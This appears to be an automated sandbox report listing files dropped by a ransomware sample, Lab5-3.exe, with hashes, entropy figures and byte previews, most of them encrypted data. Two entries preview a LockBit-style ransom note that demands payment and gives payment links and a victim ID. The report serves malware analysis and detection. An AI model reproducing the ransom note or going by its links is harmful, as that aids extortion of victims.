                                                                                                          Preview:....$8...Ds9......t..^G..92[$.M.9.T....^.p..!u.._.,c>..\F....b....f...n.52..P/..K....M...z.s..&...._..Fn..#.n].../....2..../....[.F[..~.xz...SO.@l..i..*.N....q.../9j..3.g...5c.}HF.8..4$....C.|e.}......F.K.1aA,.z.5<<9.;1.......E.f...Y.a5.p.)!`.zq....pWKg..lr..fD.'....*+......3.F.c[:.`.A.....(?..l...2.=.T.yfrN..1..-'<.....:..;.....f.WD.-.?...O.$u....W.~.&W...b..,B..k............2G.._./...".[(6...A...,$<..B.3".....o.n..&a..r.Ak...!\`TP4e........Q.:...."W.QD.b.ED}...k...p}..9`...h.0.r.M..V..S..,z.1E...Et...g.6...f..@TS.^o..dRm..@{D1!...[.:i.=..#..^.C..C..!N .b<..8R}.....c.q;.?.D..(..*.......8".w@^.|.\.f.\wS....m]6...?k. D.f..H.J.z...^..4j_....E7......9..]......W&..k..d@(.B.|EK..-......./0z..;.E...}Mq.o..Qi|..}0.'aF.6j.-N._l.L...3...dB9q%...OkY..R...........>.0..:.}..z^.T...g+.VX.,BX....mI...!..<........|.R!&.N....S...B......T..y...lL-'..(J.;h.&2D.\i..P.G.z...!.&...R...d..R.rmF].8.M.g}.7. ..G..h....8}...... ..Gz.....Ap..R.....".k..N..4..~B...O..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):107648
                                                                                                          Entropy (8bit):7.9983857013451765
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:QxUaV5OK14WtVEsrZFMg1yyXoPmR0xp+Cm382D7NhNFNr0+IsIp/zgoFr5QTZ:EPV5OMhJmgTXoPrRGtr0jxgoFWTZ
                                                                                                          MD5:FA2D73180C214BEA78E642E9CA5F6025
                                                                                                          SHA1:7C728EE56219ED1B929CC5C7C57F441B797EF058
                                                                                                          SHA-256:1E85DE07E04F3BC3374BD1132776C3DD2572AD382AF12BA8D66A02C22DB644BA
                                                                                                          SHA-512:0FF80B827A6BC0FDDFD18205B407FBB25F7807B2D8C2F9E405590CAB942C6519DD16C606158D23D900902566BBB4E9C229B72C3FBFAA801FD074E8B6720EC895
                                                                                                          Malicious:true
                                                                                                          Preview:..=....JO.k.l.*..u...<.].g.65!"..._..-.i.......Nh......u\.Jd...p...&.....e.. 6V].{"!...Qg.r...*.v.UDC>.....d...B@.x.L\.ey'..{.l"D..?....QV...}.x....vt.b..6.l.......B.1...>.N2.ny.'..S..ta)&j.....q.u...a1..#.'.n.-i=k\.."....Q0c..~.4......`.U./....Aq.T.........:I..o .L..^@..I7..........>A.......1t.....^....,'?.!.K._O...M..*...L.V.|.\Z#.u...,.~...e%QJ$..XF..$...q\.|..q..$.'.T.P..c..G...]......#...i.l...+...(.....p.G.^g^.k:Do......z.p.n..A%...7.1#.....k.0....'..U.G.".+;.&bn..-....._.z..N.EQ..?.h...dt..,..K.2...7.c!.[.T..4......2...<..`......{\.....N.g(..=<.}..=..u.q.{.....u&.0..@...:..G*)]O.%..2@KN.0B......I?.J.v.....7...uzj.V.).z.m..=..Q &O#.....[.vj.%.aa......O....K.Tm2I.(.....Ax.[..H..,..!........D..&..K..s........J.....$...H.v.L.Q....*.X./.dM.d%...?.x..@h..].....o4r...<.Zl.A..hS.....3.W...(\......K.Q<.-..C.k....i....../..Mlm.).9..).Wh..c.)....;t{..E..B..y.....%....q.....9=......O/C$...,...6W.d....4.T.=.9.>E.o]H.,J`...p.w#KVG...w4....(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21360
                                                                                                          Entropy (8bit):7.99199370864123
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:oUdIVs+JWo9TBuGk8rJSlPFd1hTEzuvMO2ZA4o5fMskSk6tb:oqVCWAEQlIFxv/mA4afMskSHZ
                                                                                                          MD5:945B50162A9D7DDE35C7395C54BD6B21
                                                                                                          SHA1:BEC00378983A9283B42107DB2420AF3E9DAA6526
                                                                                                          SHA-256:C783013D6477C7534BF2F22DF0E99AE1D7916B8EBB144D13A4E3BE6B77C415D8
                                                                                                          SHA-512:39BB3B46F5BA9E2BBA51E312CB6F0570CD05DD5012483E4C31A036708363407278F3AE732983DCDD3880F4B0FF846F55045EA2B58609CFF201998D8519666A26
                                                                                                          Malicious:true
                                                                                                          Preview:.).v.)...~.....~.i.L{.....A&..\....<kZ....x.+....3l..y...\..\NE.z..ug.VF{..=...U{%.q....^.....7V.=.gj..;(..{%U...... S.cx<...Q.k....d.&3pv..@.......\.Ijj..;..g...l.V5..:........T.p.."@.s....6...@.M...G}Q.]+t8o..oM`.u~g_..p...[.<..P...@....v%.Ki...!......f.R.V...r.....W_.A.m..[.v#.K..=8...}.._@.4.z.F..:y.<......J.....hH.../.thnt.....}...a........(u...S..4A..S.97..Vj....r......D........t........PY..)...%.f,.r.....P.<v..<....j...K .$=.........W.#.w..O.Xp...w.R.. ..:..G.....F..D....D.X?.M.W.....w1..L.C..^..z..1.cv2..l...R>....y.....9...Cv.4.,..A.F..xQ.GD...q%....xBf}q..'....)iH:.4V....".6..#.Z5k:.5f'.D..n..._YyJ5.. .9...2.F.....{.>E...(..!..:...".W.C...;....#I...^U...B.2U.....0..Q=hB.G.....y,yeU.a.GU.X.m.4X%.;.yqa..(.M&$.GV...x0..g+._......K.jJ.x...aHA@./......_.-.D.v.r.v.:#........>../V...qK..m"...].N.....R.... .<....o..h........ ........g5lFl.=...a..QV.....|.Y.....4$...?#).Y;.=k<.d..!......2.......ue...^.h.....D..4...'.G#...).)..).#.P../,5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186336
                                                                                                          Entropy (8bit):7.99903238629969
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:zBNJGfgvYOOTlSztfrYAHbXWtfaFX4u6PsWsJmiQoIRoB1JDX6z6gCt+iZ:7JGfgvYHu8QjWtf+6PsNmiQTGUzriZ
                                                                                                          MD5:E35D5C6EFC72C4BE8000629EAB01A8F5
                                                                                                          SHA1:C3B3C4C4339680D4A74B64BC1029C8B84F36A1AA
                                                                                                          SHA-256:2CE432D7CD726023D54BF31257CAD9F97EDF1297C4CE3CF48753295B70A73E43
                                                                                                          SHA-512:E28EB4771E6B2C799BE02AC39A15B46BEA0ECAA9D4D2968660DB46505D833903786440F455E7BB31D23AD01EB7685BCE9069BD5F7C0DC369E4BE8C9BDEE9D85D
                                                                                                          Malicious:true
                                                                                                          Preview:..J[: .............k"#.\.3...+....k..;..kf|{...+.=4x6.7.."... T...#.....R..6......;|<u..'.7._.#...i..R..6..j..&...'Ei.@..!$N..8].'.K.>...(..../NXR..I@>;.....6<[(8....[i..6...T.]....h....M..M./.[.y/?.O~T....-....Q..k..[Ut...S].VW.R..E..RM......x..r.X....U......T...9....^a].......b.n.d^......iI..sUU.....(.#8.....,...%Jr/9.f..OG.L[.UL:.......t:..-=rC}.xg$....d...+ 7...{...}...t.iS.k<.V(..yr..^.).4.U.....I.\...B._s(.....h: .Ep.....B;..,@..|...Y.Q.f~.m/......\W......S.2..g7!.<.?5....I.R.. .1>rQ..a.XQ.....R..+...Eb.h..q....N...,r'v.q...E...=(....a.........@..jU.^.Q...f..r.;..........~.s.....qZ4.....~.....?JS.x..=k...h=....W.zX.....!.A.....s.j0KjN.E.wI.....u.... ...*...k..E...6.L.X).p...)...i...3.`.AZ.7....7...h...uG..M..z.....2PG....=...(....QWU..i..\...7>..msL....|......h....B.C.."'p.&.&...V...f..7...B*...}d.g\DhE<..U...c..>.]Hc-.g......dr..#...Y.2.R...9....h.|..J....G-...\*........`.'..Z.?<....d..H....B..r'.....$\7...J{...}.C..O..8N.z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89392
                                                                                                          Entropy (8bit):7.997815023763334
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:I4qWITYm5qENmqcYfT/mdGquAGh8A05FVl833LVH6Chmcm/USoLJXciKwZ:IJWIl9NmKaGq/GT0JC33h6j8zNcwZ
                                                                                                          MD5:F4D878386A05FDAB3C947DD14AF84D0E
                                                                                                          SHA1:B9828F07EE0B7FB49E7061C70F6192544A786963
                                                                                                          SHA-256:8B64CF222C9B1A88FBB9F3636DAD0FF1891B2BA9B1EA29C48C75B7A1A3B1167F
                                                                                                          SHA-512:FC3A0C6301E53E8D8BC89B165B9EDE449BF8256EE155AA17831B2846AB530D8CC92FBA257F857243892545B77BF3745AB6719864ECBCABA00A6FB7535B20A70F
                                                                                                          Malicious:true
                                                                                                          Preview:........c38.....uJ._.=d.....8..SW.J...2...2u....!Vde.&..qU.gw*L.].Q.4E......B..Z..4...c..a<..R]....J..u.I.E.f../n.BB..SA.../.....D....v.G.....v#7.....o...........y..E..vG...*.........!Z_S...s"..&..?U.Vi.o;E.1.&H..DR .4M.J^.......s7.?.......%..v.......v,.!.:..UY...9j..>..%..@.`...cD@.$z......J..../X].<..@j.....{ ..O..y...).....>..K.\|].D.-.5Ji.......X._....u..3./..!W....O..~X......2...y&.6..!=..U..4...>..........i..R...+......\....;rA%R..O@.?B...../s.Q.!.`..qf....<.:......e.....=~W.VC{.Xp, ..+.o.PH..'...;V.3\kIq..?.\I..f..a..93......t\.3b...6...S...E..D.f...<]W..G6......m..4.p./...V........u..$U........$+t1!Q+...g..b.".Q#...._...?...F.....2.....<.F.~\."y....Y+..)...`..l..+.....#E...W....:A1+.....B?.p.e....D.......)...`z-S...Q2..v x..{[].e+y}..^....2X..?..I.l.z.....d&....{".2.=p:....f..R..I......g..j.J.=....?.z*g\..................._;8.{()7..<.,w7...0\.......Q..i..+R....X......&........5J..@.a.a\o..H.5..J..LR.?....c..8.. .\..M..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):467612
                                                                                                          Entropy (8bit):7.369604820894002
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:WGSMZuBIS0VMduo3bRUUxnBihTeSb9ZcbDvRft/kzAXdGcejZ:WGziIS8Mkq+URyTZifKV
                                                                                                          MD5:DDDAEA249046CA0FB6A5D190ED0E0A90
                                                                                                          SHA1:F68F9E86CDB68085508F1FBE60585D26F015349E
                                                                                                          SHA-256:B90C5EEE5999BE6B58ADACE75493DED782810BBABB7B44E8F7BBF089EE44642B
                                                                                                          SHA-512:9FCECCFFA8771D4BE125C88A14339E8C69A8F8E1E349F5899F3C3FA19D376266746ADE389F181B0E47171437DA330944397AE5A7D47C81FF21D85464724E8FF2
                                                                                                          Malicious:false
                                                                                                          Preview:P4......Z....z.r...E..jq4.)....Kr.gm..|....C.sk.......e....Uj."A.&p.J)@.QQ...;.2ZQX._.].uT/.gcKk..R......&.....MDE.x...}N[l.....t....B..r;...P...........}...AVM..".7x....q?.B.(.....6..3dc....X....f...."...."P.,@.[i.....]..`...,...9,...B..o7.hnw.D.0....4..Z.....G..B8....H....U.......!VW/..o.J...;...E....op.t(./.t.m._.,4.%`...I.....R<.1........u..@+P,i...6.W.ZB..*......PaL....Rt.v)w....C*.G....5..Ay.Qf..<#.H.........+O.N.Z3..S.2=.1:.J.1.It#......A.=V......Q...d....m.T...i&..7.......l{;.w.U..U~Lh...M.M..I.B.S........|\..........x..5...B<.B.WxX..)a..B...CjWW0y...o.].m....`I.lb.J...#...:BU......e...:...b.L....k>..s.-l....?.v...O(.x.m..Y>.._.7.....!%[.~...w..r3.~.?.02.Ox.*.$.....;V+]....3<........4.@.]...,........w}5EI..AH..4....q.Z.....ueM....4F`S.*....!H...... ......nQ.c..~....:ed.+....0!...m..t.....V}M....V..5/.s.X..L.<g.(..!...].Y.rgp..m....ql.oMhC..!n.ow%.~....$..*...1'....T.PV..t../...X.9..s3.k....EzJj.q...k..9...q.%...@J.s.^....G\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26240
                                                                                                          Entropy (8bit):7.9928235022902925
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:ngh9JOY8UTIMYzlHNrmVeaRCWK/ykoOj4c5K1B/yCfA9U1XdmB4JFvhtb:IkY8AhYzx0VeQK/y304z/u9CXdmBaBhZ
                                                                                                          MD5:894F4FD4DCF4CB55A235E7C9E36E9FDC
                                                                                                          SHA1:9CFB18739C12C61741B0FFB7C67E66AB03BAB95B
                                                                                                          SHA-256:4558DDCC5CDB207884E4EDE980DA3463BC6C1F9168902258480458F654895F54
                                                                                                          SHA-512:96C11A9010ACEF54AFFB4C551C5EFD3803F1FD16141410D95FC0242924B840354E4A4AAFC0965C6DEB960408A58BAF68328403801A4E8197D28C9F630E7AA0DC
                                                                                                          Malicious:true
                                                                                                          Preview:`........R..lH.U......}...y..e.N&...]Q...C#.....|Gh?...6D...tn.z".qb..Oo....8-.B.9.k...7@.>T........n6Y.m..?....ID.......X..-u.KfXj..Fr..db..t.|....a.. ..&Y.6B.6...Veya......s.L......'qW}....Qo...9..I>....c~.*.E2h*.T.=%c}%...mI.L.m/.-=.;.....?.^;.Y..m....Bg..)!..g..@.i.|.|Y.V..\Thv.....p7...t..j...h6...7jA+.....y.<A....9..6.Y.........i._/ .L"..`.8x.K....n.A.-3VnN.......s..AI..}..C..F.m..6q..cI..+...C...E.n2.4j+...<..F.^......a..lO..R=I..z.m....*..*/...|%..W....z..7.*s...4=.....Q.0..82 N.T.. 2..$A...K.g3..}o...-..p....G.......z..+?z..h....WX.; A^...f..Z.=.k.<.5d.:.+..G>hV.n. Z.l?4..z.YQ.S.o/....\.:5w".=..!#....T.A.5.Z9iJ..z.....c.C..4.B...+R.td...o.J..R..........0F.+...5...pU.@.FR..8.......4..~.u.9$8...}E..z...Amy^a..w.HN.wF....qOi*].._.7....\.V.>....G2.O..qVB..R....<....od@Z...uv....{e.cF...+..jcxP.y..8d$Xn..k...z)A1 .e..^.6.X..Zr=.(N....k@T._........p.....$..1*.al...&mHh.c._P...$.......*..0..t.X.........I....[..f..FJBB.u5..i.V.t.6...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):900452
                                                                                                          Entropy (8bit):6.711788892032022
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:RIcxErOgGddJA/xUZ42oheVyQiqQ/vPvy7rE4zm3o2UqoUfaGJ:lxEdSO/eZXoKHidPvyoo2UGfay
                                                                                                          MD5:C02B1B0ED584D5C72B70EE7518B4A47C
                                                                                                          SHA1:C1D9CBBA9F9C1D9A44086ECB97F24DF73CECEE71
                                                                                                          SHA-256:E0964F6A701A401E040B4A47235D7EDA64A79D61D8495ACCDCC7CCEC64BB178B
                                                                                                          SHA-512:AB4B564E15E9F5116CF61C85AFBD682E864BEE7D95788657BFF691A7B82D5AD07466384A88A722B430732D365124561E6636D93D49F9E7374202F800336782FB
                                                                                                          Malicious:false
                                                                                                          Preview:.1??@.'...V|D..x.q..Y..:..+...8...PNJ.~.':.fG}...x..J.(.......$!yg..h;.A..8R...`.....gR....Q.....B.UQ.....&C4.2T.{c...l.=..Z...*.(.`.P.6......m]......k..'eV..%-.W.Q,.].....QA)>L..*.[....6...^].c....J*<...u..H6Yw."{....x.f...?...D{...y........g2.f?..r. ..../...A....>.Frq.6..e.T..-.7.ot.#.}p....Ax.b.6:...k....(.....lX.G...M"0Y.....2...V.J.!...TP.....Z.DQ.)..y.8....[......k.w....#"....J...1..>Fe./..$/...,.<z...>......Wt....k..G.[....l..Fq.?..<..a ... ......4pV.jM........(.].YU3.<.6^"../L..PE...L..&B..H..+.g...o..!..Ch\. p..H}.w.VY..p.Bld.^..'....4R(......|.6>..}h.......&...E..E..2u.....5...(.h.>'...+..$.T.%.f.2A..8..X.ir..C......2.eoi.....|......3.[........[zw...G"p.&.....m.......a;....(........[.}E.M:...V.!ey..7W..$.....k........1.6.N..G5...QR.").WlK.m.....g......`..Q..}p..?..B......w.;./0..~C.Xz9tVat...Co..s.Gq..P@<.J}.r.....U....i<....t.I.B7...#.....v..._..fr.2....K....3.-........C,.$dbs...G.S.u=....*..0.[.oMP6m.....F.ZX.s....TR......z]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1792
                                                                                                          Entropy (8bit):7.891979952837898
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pz6vTibHfUTid3hBaUoSGFcmeykEdEElU92i:pz4RGx0uKeY2ElUJ
                                                                                                          MD5:82105B2A19E3B7860DD5163E39549696
                                                                                                          SHA1:A2DCC26A233EA7F18FA8FE793FEEC80E572B43B3
                                                                                                          SHA-256:599873BEDDEFFB45289407366A420800A4D5470ED54C337623B56156E71E59EB
                                                                                                          SHA-512:5983BE93712E911AD3287655330C74A29A3B22526F1E2607B11A375898F64CBC5A06889B99831D0B2DCE736E8725FF836B46C8D1B21D6BB00B14E05B965A2681
                                                                                                          Malicious:false
                                                                                                          Preview:.6f.......w.O....s...O.".'.T..[...0`.h..1mY.W.q.......=...y).Y.F.^..1.In..^....HLx.B.Z.eq^}....W..|`.Pc.{J}...T.........'..........o.j{K..5f..3F.\..$K...^....UIt:.P#-.....VvD*=.[d..zo....xf......_l.......8..qh....'.KA..O..b.c\...Hh)....B1/Mj.54..:<.6..'ml..N.\....,pE.77H...j..?qn~d...[)V.e......Fs1.0.P.!.k.#..^.c@..F.=.lCz.%...1.........#.O.u..3...P..=o!....E..4U..H.A'"...,..p>..E$.....P.c$~q!...........L|.6.*....X..T...T......K.]W..n..5_.m.... >..Q.%..a.v...:[6.Ii..C.(7.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):462653
                                                                                                          Entropy (8bit):7.416849610218491
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:rNApa4nX9Tk5+aRtzS913LpYJxyYzBVgeIo/zt8OwWxMylkN/wDcFHnpcFWncF7R:aaO9Tk5+Ut23Yjd/zt8OTGyltk1u
                                                                                                          MD5:50A6F480B0F2A89DECF86842CF94DAC2
                                                                                                          SHA1:3ECD0E0802309DA42C13F583347BE0CDA544E33C
                                                                                                          SHA-256:3FEB78508A80026D2ACBB960C3C0B38F1864E2E31B0DC513F860126E7D0FB8D6
                                                                                                          SHA-512:0853E8152A663480B33539CB15A99C7043C32E807AD606EB2CBEA3AF1B99406C254994B31661E6C5166C922971652EECFB1CC82E3EDFB148D820E835FFA550E6
                                                                                                          Malicious:false
                                                                                                          Preview:N.SC.)..WX_.y........p.j....K"..'I[.k..^R;.,...y...89....P2~F.5.-..\u...3.h...\*.h.5K....0.A.dO&.mp.B../....S."..:_G....]fEC.....1.F.r./..w@....a...E..,E.*K...-.3(...U...!.f....W.f.d.m&.....o.G.4..%SM,......\......;.<..3kj..F.ZV_r..S...E.....9(.......n...R........b...f.\..........0Nf...3;..2XJ_.m.B.....9`..WL%..0....j.Q.1_..r...../W...+R^-D....U.......T..!7..H....i.c...n....6...'.v...D.......q.x...1.4.N....l-....f..+./.d......../.~.L.D...UPW...T.....y.w'S..\.d....L`..~.c.W..748m..Wge...0T....`4..}.=.z...o4.g.[.H.../..Zg......F.N.~...G7....m.8sVm3#.b...1jq.'..d0.GE.....1..t_...~&78mN.e......A.{j.g.4[..3.u+..4...)...~..D.<.}.....I..G.. ..OL....E3.5..2...U<.SBb..m..;.j....S......D.V<.%.~p.+......ho...!..[..G2V:.$..#W.U..Ks..6.Z..*..-..w<..s.:.A..(........T.G.R.M...#.=...........{.-^.J).9F....U...../......L.i...bS...Q.:..R.......G...,Y.;.P.z.2..<LcI.1_..CP.O../X..p..j..zp.L.:...lQ.z..r..../`N.>\|.m../..z......|.S...~C7q?....._.pTv.I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):166016
                                                                                                          Entropy (8bit):7.9987910599375
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:BhfuswRQZqr7h36qhF7FYKl7x4mv2zp8g+dGI1U6pg+g/cirYZ:zGsfZqrt6qhFvP4muzp8gOGI1by/cpZ
                                                                                                          MD5:DB2490AE055658D28683809940D95095
                                                                                                          SHA1:46A3E603A6483B9A6082F0A5188C7CE9EB97B0DC
                                                                                                          SHA-256:464BEB7B649236B1FBD9560960E02BF062D589FF4D0E7D6A66277AEE21B400A5
                                                                                                          SHA-512:3C787ED59429DDCD3770B8E48F7159E8115211471A2516B229FCB8D7A8D965AFA8E8867FA1BB67DC32A6B5E24C961FB7AEF581A0C0178F25A3817FD9141E1BEA
                                                                                                          Malicious:true
                                                                                                          Preview:.q-...%Pd#.V)P.7..[.+.W.m.b..xxm....(.h./...`.......T.....|..%.u:gX.X...TV._,.=...>.rz....I..A..d.......m<^....v.S1....?.._+....n.!...r..Q...&&Z.jf.....<..j.....|..F..jZ.....1...A...A.M..L4...e..eA..(....5....]...|.k.!l.t........3s.,..U.8..?....n....j..p...MfDj.Z+.P.H..2N.d{.h..f.TL.v.I#.m.W.n9..=..T=.SF........J..ddVQ...\K......UX.........xG.A..P5!VR?.....<"IS....E4p.!..Q@..i{..U:....|...I..4...FARR..9d...y...R....(...U..r#....&...>J.._./..j........[..9.....lf.9.4u.g.VlX.........n..._/X.$.....`...fI/....~s$.h..I..U.[\...3j.@+.u.u....Uh..ye0x..~..I.kY~...}cP3.....Q..ER....".....GWR..@.g.ww.....N.%..lBV.C.O.O...oW.V..sw..!....q.wM..G...MK.......w.\k..Z.].[..B...e.X?.i./...R"6.l..q.Swo#.i..X.b.X.& j0.*...boU.t...m.G....3.vh.Z|....o....{.MB.G..V..*,...w8..\.iO..^../.V.e.Tb[{....x........%.._.l...U. L...0...<....b.~.......Z?.^.P.k..)...]^'#.......7LP\.e....../..'....N..vw..N.39g...]s6.P...&6i..T].V.......A.V4...{.5.....}.S.t.h.q#..Fh...a..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2096
                                                                                                          Entropy (8bit):7.9100614779115554
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OgINBUHPpdVrMHfUTid3hBaUoSGFcmeykEdEElU92i:tINBURfGx0uKeY2ElUJ
                                                                                                          MD5:BCD09BD34978D57BB7C00C5F915389A6
                                                                                                          SHA1:263928279B261FC81FDFBE0E362A20F377890FA0
                                                                                                          SHA-256:15E00E31AEFD1CE40C2CBAF5213942DEFA993F3FF2387D5321D7ADC4774B8FAF
                                                                                                          SHA-512:1DA09A73DF6B0CE7FF4BE66A26401169DADA433931A5D0E84960444D3F99717185B77363787FEB2D8C117298A0EB3E850098C58CFA537E9CA170887C7B4EF5D4
                                                                                                          Malicious:false
                                                                                                          Preview:0.."".k.hD...dy.h.z....z....x.f/Y;z...<e.....-........6v()..;...^..V..f3..}..exy.0.....b...TN.(.z>?!hh.k............e..O.e..IAc5.u5w&].....V.`T.~u...M..........qL.H.(..e..5]..(..k2.o5`W4..t...u.P"....UH.Pdk..}.....]k...+..:...Z.(.K#x..s.=....z.h.....{...0...i..ZO+-"`8......81N.*;.........MG.@o..T... ./.:K..2n..g..u,._.W....&ch...y..e8.m..>\T.m.J.W."...XS5.U.h...E...>.r.....'.B.$.....}.......P.X..._;....!.~.....v..?..C....>..~U..7...]tK..._0...Tv.~.....z..O"......>..1.n......r.....m.....H..l.~x.g...=`......O|.(..F/....J>V..r....3.-=.F...P44<..W...r..j%>esw5.Z5....)...O.'..].T....j3Z.6..6.-{..?.=d...2)......R.....8.o..T;.t;N.@.....8.M..R..]...U...x>>I......i....P..8W(9..Ru........3..1D......|P.......=..e}6.xS.!.R.!.G.h..a*......xv..q.!Z^>.X......6...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.9025547805278995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yU69bYnQrsTclSbHfUTid3hBaUoSGFcmeykEdEElU92i:ynbYKGx0uKeY2ElUJ
                                                                                                          MD5:933CD1351A8B579B47F04F79A4D1264E
                                                                                                          SHA1:5D23E3C31F7B9CB0BBD9B2354C62EF9E28136C93
                                                                                                          SHA-256:886A42D29300998D55880012BF7C291DBA1DA842FBEB0EA12AF867A4A79614B9
                                                                                                          SHA-512:C2B7FB4BD044264988F049A4254D51DEAF88CA120DDD88E7626FDC8328D48F92D22BBA6B07CEDEFB169CEBB1A4C387FB9F217BF58E4C034FCE22AF74C6166691
                                                                                                          Malicious:false
